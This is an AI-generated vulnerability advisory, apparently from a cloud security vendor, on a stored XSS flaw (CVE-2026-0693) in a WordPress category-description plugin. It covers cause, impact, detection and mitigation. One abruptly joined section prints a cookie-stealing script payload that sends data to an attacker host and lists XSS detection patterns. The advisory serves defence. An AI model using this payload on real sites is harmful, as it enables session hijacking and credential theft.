
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-0693 is a Stored Cross-Site Scripting (XSS) vulnerability in the "Allow HTML in Category Descriptions" plugin for WordPress, affecting all versions up to and including 1.2.4. The plugin unconditionally removes the wp_kses_data output filter for term_description, link_description, link_notes, and user_description fields without verifying user capabilities, allowing authenticated attackers with administrator-level access to inject arbitrary web scripts into category descriptions. The vulnerability is only exploitable on multi-site WordPress installations or installations where unfiltered_html has been disabled. It was published on February 14, 2026, and carries a CVSS v3.1 base score of 4.4 (Medium) (Red Hat CVE).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). The plugin removes the wp_kses_data filter from WordPress output hooks (term_description, link_description, link_notes, user_description) unconditionally, bypassing WordPress's built-in HTML sanitization for these fields regardless of whether the current user has the unfiltered_html capability. An authenticated attacker with administrator-level privileges can craft a malicious category description containing JavaScript payloads; these scripts are stored in the database and execute in the browser of any user who visits a page rendering the affected category description. Exploitation requires high attack complexity and high privileges, and the scope is changed (affecting users beyond the attacker's session) (Red Hat CVE).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of other users' browsers whenever they visit a page displaying the poisoned category description. This can lead to session hijacking, credential theft, unauthorized actions performed on behalf of victims, and potential privilege escalation within the WordPress environment. Confidentiality and integrity are both impacted at a low level; availability is not affected. The changed scope means the impact extends beyond the attacker's own session to other site users (Red Hat CVE).
No public proof-of-concept exploit code or evidence of in-the-wild exploitation has been identified for this vulnerability. The EPSS score is approximately 0.026%, indicating a very low probability of exploitation in the near term. The vulnerability requires administrator-level authentication and is further constrained to multi-site WordPress installations or those with unfiltered_html disabled, significantly limiting the attack surface. It is not currently listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Red Hat CVE).
unfiltered_html disabled, and that the "Allow HTML in Category Descriptions" plugin version ≤ 1.2.4 is active.<script>document.location='https://attacker.com/steal?c='+document.cookie</script>. Because the plugin removes wp_kses_data filtering, the script is stored without sanitization.wp_terms or wp_term_taxonomy table entries for category descriptions containing <script>, javascript:, onerror=, onload=, or other event handler attributes.WordPress site administrators should update the "Allow HTML in Category Descriptions" plugin to a version beyond 1.2.4 that addresses this vulnerability, once a patched release is available from the plugin author. As an interim workaround, administrators can deactivate or remove the plugin entirely to restore WordPress's default wp_kses_data output filtering on description fields. On multi-site networks, network administrators should audit which plugins are network-activated and restrict administrator capabilities where possible. Ensuring that only trusted users hold administrator roles reduces the risk of exploitation (Red Hat CVE).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."